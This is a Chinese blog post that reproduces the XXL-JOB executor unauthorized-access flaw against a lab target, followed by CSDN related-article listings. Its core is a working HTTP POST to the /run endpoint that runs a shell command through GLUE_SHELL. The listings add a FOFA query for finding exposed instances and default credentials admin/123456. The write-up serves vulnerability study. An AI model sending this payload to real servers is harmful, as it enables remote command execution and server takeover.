XXL-JOB executor未授权访问漏洞

最新推荐文章于 2024-04-06 07:57:20 发布
最新推荐文章于 2024-04-06 07:57:20 发布
阅读量462 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912035/article/details/112000142
版权

漏洞详情

XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的Restful API接口或RPC接口没有配置认证措施,未授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。

漏洞利用条件

XXL-JOB <= 2.2.0

漏洞利用过程

访问xxl-job的客户端
提交如下数据包
在这里插入图片描述

返回200说明已经成功执行

payload内容
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
“jobId”: 1,
“executorHandler”: “demoJobHandler”,
“executorParams”: “demoJobHandler”,
“executorBlockStrategy”: “COVER_EARLY”,
“executorTimeout”: 0,
“logId”: 1,
“logDateTime”: 1586629003729,
“glueType”: “GLUE_SHELL”,
“glueSource”: “touch /tmp/success”,
“glueUpdatetime”: 1586699003758,
“broadcastIndex”: 0,
“broadcastTotal”: 0
}

进入靶机内见文件已经创建成功

在这里插入图片描述

weixin_44912035
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞库】XXL-JOB executor 授权访问漏洞导致RCE
yuan_boss的博客
11-03 1011
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/
XXL-JOB executor 授权访问漏洞
玄道的网安博客
12-23 1654
漏洞概述 XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的API接口没有配置认证措施,授权的攻击者可构造恶意请求,触发反序列化,造成远程执行命令 影响版本 XXL-JOB <= 2.2.0 环境搭建 进入目录 cd vulhub-master/xxl-job/unacc/ 启动2.2.0版本的XXL-JOB docker-compose up -d http://your-ip:8080是管理端(admin) http://your-ip:.
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 102
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
XXL-JOB executor 授权访问漏洞_xxl-job漏洞,拥有百万粉丝的大牛讲述学网络安全的历程
最新发布
m0_61549674的博客
04-06 1053
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
xxl-job-executor:与xxl-job-executor的集成
04-19
xxl-job-executor的gin中间件背景xxl-job-executor-go是xxl-job的golang执行器,可以独立运行,有时候我们要与项目或者框架(如:gin框架)集成起来合并为一个服务,本项目因此而生。执行器项目地址与gin集成示例...
xxl-job-executor-go-master
06-19
XXL-JOB是一个分布式任务调度平台,而"xxl-job-executor-go-master"则表示这个项目是XXL-JOB的Go语言实现版本的源码仓库。这个仓库是针对XXL-JOB执行器的一个Go语言实现,它使得开发者可以利用Go语言来编写调度任务...
xxl-job-admin、xxl-job-core、xxl-job-executor 的源码引入项目中.docx
07-03
### 将xxl-job-admin、xxl-job-core、xxl-job-executor的源码引入项目中的实践 在探讨如何将这三个组件(xxl-job-admin、xxl-job-core、xxl-job-executor)有效地引入到项目中之前,我们需要先了解它们各自的作用及...
xxl-job适配达梦数据库
02-02
XXL-JOB由两部分组成:调度中心(XXL-JOB-Scheduler)和执行器(XXL-JOB-Executor)。调度中心负责任务的调度策略配置、触发以及监控,而执行器则执行实际的任务逻辑。在适配达梦数据库之前,XXL-JOB通常默认使用...
xxl-job-admin-2.4.1-SNAPSHOT之oracle版
10-09
XXL-JOB是一个分布式任务调度平台,主要由两部分组成:调度中心(xxl-job-admin)和执行器(xxl-job-executor)。本资源“xxl-job-admin-2.4.1-SNAPSHOT”是针对Oracle数据库的版本,意味着它已经配置好与Oracle...
XXL-JOB executor 授权访问漏洞复现
m0_53603468的博客
12-25 2850
概述 XXL-JOB executor 授权访问漏洞 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,授权的攻击者可以通过RESTful API执行任意命令。 不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全
xxl-job 2.2之后版本高版本executor授权访问漏洞
一个码农的笔记
09-28 8860
xxl-job executor 高版本授权访问漏洞利用
XXL-JOB 任务调度中心 后台任意命令执行漏洞
热门推荐
LiBai'S BLOG
10-17 3万+
在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。
XXL-JOB任务调度中心后台命令执行漏洞
chaojixiaojingang
04-13 5027
1.漏洞描述 XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。 2.资产查找 FOFA:app="XXL-JOB" || title="任务调度中心" 3.漏洞复现 1)以默认弱口令admin/123456进入后台 http://ip/toLogin 2)选择任务管理模块,新增任务 (PS:运行模式选择GLUE(Shell)) 3)点击 GLUE IDE编辑脚本,输入命令 4)操作选择执行一次 ...
java 远程执行linux命令_XXLJOB 远程命令执行漏洞
weixin_39847887的博客
11-24 1393
近日,深信服安全团队发现XXL-JOB调用授权API接口导致远程命令执行漏洞攻击。XXL-JOB默认不开启API接口认证,攻击者可以通过调用授权的API接口,直接发送恶意请求,执行任意系统命令,达到控制服务器的效果,危害性较大。漏洞名称: XXL-JOB 远程命令执行漏洞威胁等级:高危影响范围: XXL-JOB <= 2.2.0漏洞类型: 远程命令执行漏洞利用难度...
xxl-job访问令牌错误
08-19
xxl-job访问令牌错误是指在xxl-job分布式任务调度平台中,访问令牌被错误地使用或提供,导致无法正常访问或执行任务的情况。根据引用和引用的描述,xxl-job默认情况下没有配置认证措施,即没有对访问令牌进行验证。这意味着授权的攻击者可以构造恶意请求,通过Restful API接口或RPC接口执行任意命令,进而控制服务器。因此,在xxl-job的安全配置中,正确设置和使用访问令牌是非常重要的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [xxl-job2.3.0集成nacos配置,注册中心](https://download.csdn.net/download/weixin_44618291/85347103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [漏洞复现----21、XXL-JOB executor 授权访问漏洞](https://blog.csdn.net/sycamorelg/article/details/118609173)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [XXL-JOB executor授权访问漏洞](https://blog.csdn.net/qq_41832837/article/details/110632861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值